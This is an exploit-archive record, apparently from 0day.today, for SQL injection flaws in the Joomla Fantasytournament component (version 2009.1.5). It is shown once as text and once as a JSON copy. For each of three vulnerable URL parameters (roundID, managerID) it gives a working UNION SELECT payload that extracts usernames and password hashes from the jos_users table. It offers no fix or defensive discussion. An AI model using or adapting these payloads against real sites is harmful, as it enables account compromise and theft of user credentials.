ID 1337DAY-ID-4668
Type zdt
Reporter [email protected]
Modified 2009-01-14T00:00:00
Description
Exploit for unknown platform in category web applications
================================================================
Joomla Component Fantasytournament SQL Injection Vulnerabilities
================================================================
#############################################################################
# #
# Joomla Component Fantasytournament Multiple SQL Injection Vulnerabilities #
# #
#############################################################################
########################################
[~] Vulnerability found by: [email protected]
########################################
[~] ScriptName: "Joomla"
[~] Component: "Fantasytournament (com_fantasytournament)"
[~] Version: "2009.1.5"
[~] Date: "01/01/2009"
[~] Author: "Adrian Gray"
[~] Author E-mail: "[email protected]"
[~] Author URL: "www.graymoose.com"
[~] Component info: "http://extensions.joomla.org/extensions/sports-&-games/sports/1604/details"
########################################
[~] Exploit 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=[SQL]
[~] Example 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--
########################################
[~] Exploit 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=[SQL]
[~] Example 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
########################################
[~] Exploit 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=[SQL]
[~] Example 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
########################################
# 0day.today [2018-01-01] #
{"id": "1337DAY-ID-4668", "lastseen": "2018-01-01T23:03:22", "viewCount": 6, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-01-01T23:03:22", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-01T23:03:22", "rev": 2}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/4668", "description": "Exploit for unknown platform in category web applications", "title": "Joomla Component Fantasytournament SQL Injection Vulnerabilities", "cvelist": [], "sourceData": "================================================================\r\nJoomla Component Fantasytournament SQL Injection Vulnerabilities\r\n================================================================\r\n\r\n\r\n#############################################################################\r\n#\t\t\t\t\t\t\t #\r\n# Joomla Component Fantasytournament Multiple SQL Injection Vulnerabilities #\r\n#\t\t\t\t\t\t\t #\r\n#############################################################################\r\n\r\n\r\n########################################\r\n\r\n[~] Vulnerability found by: [email\u00a0protected]\r\n\r\n########################################\r\n\r\n[~] ScriptName: \"Joomla\"\r\n[~] Component: \"Fantasytournament (com_fantasytournament)\"\r\n[~] Version: \"2009.1.5\" \r\n[~] Date: \"01/01/2009\"\r\n[~] Author: \"Adrian Gray\"\r\n[~] Author E-mail: \"[email\u00a0protected]\"\r\n[~] Author URL: \"www.graymoose.com\"\r\n[~] Component info: \"http://extensions.joomla.org/extensions/sports-&-games/sports/1604/details\"\r\n\r\n########################################\r\n\r\n[~] Exploit 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=[SQL]\r\n[~] Example 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users--\r\n\r\n########################################\r\n\r\n[~] Exploit 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=[SQL]\r\n[~] Example 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--\r\n\r\n########################################\r\n\r\n[~] Exploit 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=[SQL]\r\n[~] Example 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--\r\n\r\n########################################\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "published": "2009-01-14T00:00:00", "references": [], "reporter": "[email\u00a0protected]", "modified": "2009-01-14T00:00:00", "href": "https://0day.today/exploit/description/4668"}
{}